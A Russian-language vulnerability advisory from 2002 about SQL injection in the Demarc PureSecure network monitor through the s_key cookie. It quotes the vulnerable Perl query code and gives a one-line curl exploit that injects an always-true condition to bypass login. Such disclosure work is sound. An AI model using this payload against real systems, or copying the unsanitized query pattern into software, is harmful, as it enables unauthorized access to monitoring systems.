Вставка SQL запроса в Demarc PureSecure

Дата публикации:
18.04.2002
Всего просмотров:
733
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание:

DEMARC - комплексная программа контроля сети, которая позволяет вам контролировать сеть через дружественный Web интерфейс.

Из-за недостаточной проверки правильности ввода пользователя, удаленный нападающий может вставить произвольный SQL запрос через куки (s_key).

--------- line 319 ------------------------------
elsif (($cookies{'s_key'}) && ($cookies{'s_key'}->value)){
$logged_in_as = &check_login($cookies{'s_key'}->value);
if (!$logged_in_as){
&print_login_screen;
&safe_exit;
}
-----------------------------------------------------

s_key = будет использоваться для SQL в запросе функции check_login (line 6114)

---------lini 6114---------------------------------
$sql_query = " SELECT \
f1,f2,f3,admin,username,UNIX_TIMESTAMP
(current_login_timedate) AS LOGINTIME \

FROM \
dm_sessions \
WHERE current_session_id = '$session_id' ";

Эксплоит:
Using <http://curl.haxx.se/download/> cURL:
curl -b s_key=\'%20OR%20current_session_id%20like%20\'%\'%23 https://<lame
host>/dm/demark

Уязвимость найдена в Demarc PureSecure 1.0.5 Windows
 



Ссылки: Источник
или введите имя

CAPTCHA